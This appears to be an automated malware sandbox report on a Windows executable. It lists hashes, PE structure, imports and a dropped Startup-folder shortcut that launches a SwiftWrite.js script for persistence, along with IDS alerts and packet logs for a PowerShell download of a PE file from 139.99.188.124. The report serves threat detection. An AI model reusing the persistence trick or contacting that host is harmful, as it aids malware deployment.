                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):99
                                                          Entropy (8bit):4.9306597478632
                                                          Encrypted:false
                                                          SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5yKXW/Zi+URAAy:HRYF5yjo923yKXW/Zzyy
                                                          MD5:EF6AD112185745A629FB60A8A2678649
                                                          SHA1:500391A0E969362BFA1DFE7A116A9395E29D29DA
                                                          SHA-256:14555F0A16F710F533606B316DE7765634F60BD9FC5D1946D80EAA29104ACAF9
                                                          SHA-512:2F3E1A025E02EB111BB3E9F6E1CCEE3AD3A7A7BC90C0DF7D0C4ECD90BA7792A5D3C361113423BC9ED035FCA77EA5B9870AD1B648E1A86E717F7D29672699176D
                                                          Malicious:true
                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                          Static File Info

                                                          General

                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):6.306583416277578
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:cxZuGa.exe
                                                          File size:1'083'904 bytes
                                                          MD5:243e64fa2b25bba3e6c710de1bdd4b0c
                                                          SHA1:a5d90ba12791750258295c3601f55bc170badaa4
                                                          SHA256:cb284dd8a8bf729793df1cac357478c0bed3d011ae5f2b9223327ce9973f2172
                                                          SHA512:8cf227c0bf730b06476cdd35c45fa10388318c6761f3fe0dd1950c1b16eba59b18f4aa94e9c8124224648cfb1e3337d461ed597def53942da57e2949c008fa23
                                                          SSDEEP:24576:zrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaD15:z2EYTb8atv1orq+pEiSDTj1VyvBaJ
                                                          TLSH:FC357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
                                                          File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG

                                                          File Icon

                                                          Icon Hash:0fd88dc89ea7861b

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x14002549c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67604A2C [Mon Dec 16 15:41:32 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:2
                                                          File Version Major:5
                                                          File Version Minor:2
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:2
                                                          Import Hash:fadc5a257419d2541a6b13dfb5e311e2

                                                          Entrypoint Preview

                                                          Instruction
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007FD1911427D0h
                                                          dec eax
                                                          add esp, 28h
                                                          jmp 00007FD1911420DFh
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          dec eax
                                                          mov ebx, ecx
                                                          dec eax
                                                          mov eax, edx
                                                          dec eax
                                                          lea ecx, dword ptr [0009466Dh]
                                                          dec eax
                                                          mov dword ptr [ebx], ecx
                                                          dec eax
                                                          lea edx, dword ptr [ebx+08h]
                                                          xor ecx, ecx
                                                          dec eax
                                                          mov dword ptr [edx], ecx
                                                          dec eax
                                                          mov dword ptr [edx+08h], ecx
                                                          dec eax
                                                          lea ecx, dword ptr [eax+08h]
                                                          call 00007FD191143CE9h
                                                          dec eax
                                                          lea eax, dword ptr [0009467Dh]
                                                          dec eax
                                                          mov dword ptr [ebx], eax
                                                          dec eax
                                                          mov eax, ebx
                                                          dec eax
                                                          add esp, 20h
                                                          pop ebx
                                                          ret
                                                          int3
                                                          dec eax
                                                          and dword ptr [ecx+10h], 00000000h
                                                          dec eax
                                                          lea eax, dword ptr [00094674h]
                                                          dec eax
                                                          mov dword ptr [ecx+08h], eax
                                                          dec eax
                                                          lea eax, dword ptr [00094659h]
                                                          dec eax
                                                          mov dword ptr [ecx], eax
                                                          dec eax
                                                          mov eax, ecx
                                                          ret
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          dec eax
                                                          mov ebx, ecx
                                                          dec eax
                                                          mov eax, edx
                                                          dec eax
                                                          lea ecx, dword ptr [0009460Dh]
                                                          dec eax
                                                          mov dword ptr [ebx], ecx
                                                          dec eax
                                                          lea edx, dword ptr [ebx+08h]
                                                          xor ecx, ecx
                                                          dec eax
                                                          mov dword ptr [edx], ecx
                                                          dec eax
                                                          mov dword ptr [edx+08h], ecx
                                                          dec eax
                                                          lea ecx, dword ptr [eax+08h]
                                                          call 00007FD191143C89h
                                                          dec eax
                                                          lea eax, dword ptr [00094645h]
                                                          dec eax
                                                          mov dword ptr [ebx], eax
                                                          dec eax
                                                          mov eax, ebx
                                                          dec eax
                                                          add esp, 20h
                                                          pop ebx
                                                          ret
                                                          int3
                                                          dec eax
                                                          and dword ptr [ecx+10h], 00000000h
                                                          dec eax
                                                          lea eax, dword ptr [0009463Ch]
                                                          dec eax
                                                          mov dword ptr [ecx+08h], eax
                                                          dec eax
                                                          lea eax, dword ptr [00000021h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c100x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xfb0000x14100.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf40000x6f48.pdata
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000xa74.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xc70500x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xd9aa00x28.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc70700x100.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1138.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xb33280xb3400507a8505198e35cc9675301d53e3b1c4False0.5503358721234309data6.5212967575920215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0xb50000x342040x344009eda36be0cf076085a2f9772c1ee5803False0.30884139503588515data5.360588077813426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xea0000x91200x5000ec6b77d6ef8898b0d3b7d48c042d66a0False0.040673828125DOS executable (block device driver)0.5749243362866429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .pdata0xf40000x6f480x70004416e27f8be9f9271c439d2fd34d1b2dFalse0.49612862723214285data5.911479421450324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0xfb0000x141000x1420074faf2e67a4549158ddb7c6840305c71False0.19358986801242237data4.246532862729617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1100000xa740xc005ddb0e422ace102fe530e589a0cbec6fFalse0.4850260416666667data5.139847116863034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xfb4580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xfb5800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xfb6a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xfb7d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
                                                          RT_MENU0x10bff80x50dataEnglishGreat Britain0.9
                                                          RT_STRING0x10c0480x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0x10c5dc0x68adataEnglishGreat Britain0.2735961768219833
                                                          RT_STRING0x10cc680x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0x10d0f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0x10d6f40x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0x10dd500x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0x10e1b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0x10e3100x8d4data1.0048672566371681
                                                          RT_GROUP_ICON0x10ebe40x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x10ebf80x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x10ec0c0x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x10ec200x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x10ec340xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x10ed100x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
                                                          USER32.dllGetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
                                                          GDI32.dllEndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                          OLEAUT32.dllVariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-02T10:54:56.815327+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.549704139.99.188.12480TCP
                                                          2025-01-02T10:54:56.815357+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download2139.99.188.12480192.168.2.549704TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 2, 2025 10:54:55.928639889 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:55.935251951 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:55.935323954 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:55.946582079 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:55.952388048 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815186977 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815206051 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815213919 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815218925 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815224886 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815233946 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815257072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815268040 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815326929 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:56.815356970 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815362930 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:56.815372944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.815423965 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:56.820266962 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.820322037 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.820334911 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.820358038 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:56.820379019 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:56.820398092 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.020172119 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020190954 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020200968 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020207882 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020338058 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.020416021 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020427942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020438910 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020467997 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020473003 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.020479918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.020510912 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.021322966 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.021336079 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.021347046 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.021378994 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.021392107 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.021398067 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.021404982 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.021436930 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.022178888 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.022198915 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.022208929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.022248030 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.022299051 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.022310972 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.022346020 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.023098946 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.023133993 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.023144007 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.023147106 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.023176908 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.023191929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.023267984 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.023318052 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.025152922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.066610098 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.225331068 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225344896 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225363016 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225373030 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225383043 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225442886 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.225477934 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225480080 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.225491047 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.225523949 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.226404905 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.226460934 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.226627111 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.227210999 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.227221966 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.227266073 CET4970480192.168.2.5139.99.188.124
